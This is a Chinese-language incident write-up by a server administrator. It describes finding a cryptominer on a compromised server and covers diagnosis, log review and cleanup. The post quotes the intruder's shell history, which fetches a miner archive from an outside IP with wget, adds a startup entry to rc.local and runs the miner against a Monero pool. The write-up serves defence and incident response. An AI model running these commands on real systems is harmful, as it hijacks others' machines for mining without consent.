服务器被入侵当做挖矿肉鸡

早上到公司发现zabbix有一个报警：一台服务器的CPU使用率达到100%！
1.立即登录该服务器查看CPU top10

ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head

发现 有一个yam开头的进程CPU已经占用120%，（此处无截图）
经确认，并非业务上的应用，凭经验分析，可以断定是被入侵了。

2.find找一下本地有没有yam相关的目录

find / -name yam

已经查到了（下图），就在root家目录下，有压缩包，还有解压的目录，痕迹也太明显了吧！ 打开看一下里面的内容发现是一个挖矿机。

3.查看下登录日志

last

这三个IP是美国的，不知道是不是代理，然后看一下登录进来都做什么操作了：

history

贴出关键部分

884  wget http://210.245.92.160:9090/miner.tgz885  vi /etc/rc.d/rc.local886  tar zxvf miner.tgz887  cd yam-yvg1900-M7v-linux64-generic888  cd linux64-generic889  nohup ./yam -c 1 -M stratum+tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3:x@erebor.dwarfpool.com:8005:8050:8080:8100/xmr

很明显，下载了这个包，解压运行了，还加了开机启动，不过竟然没有清除痕迹就走了。

4.看一下他get的这个网站

好吧，自己做的一个页面方便别人下载矿机用的。
在里面的文件发现软件的作者

5.清理工作
kill 掉进程
删除root家目录的包
删除/etc/rc.d/rc.local中的开机启动项
更改root密码

先做这么多，大家还有什么好的建议请多指教。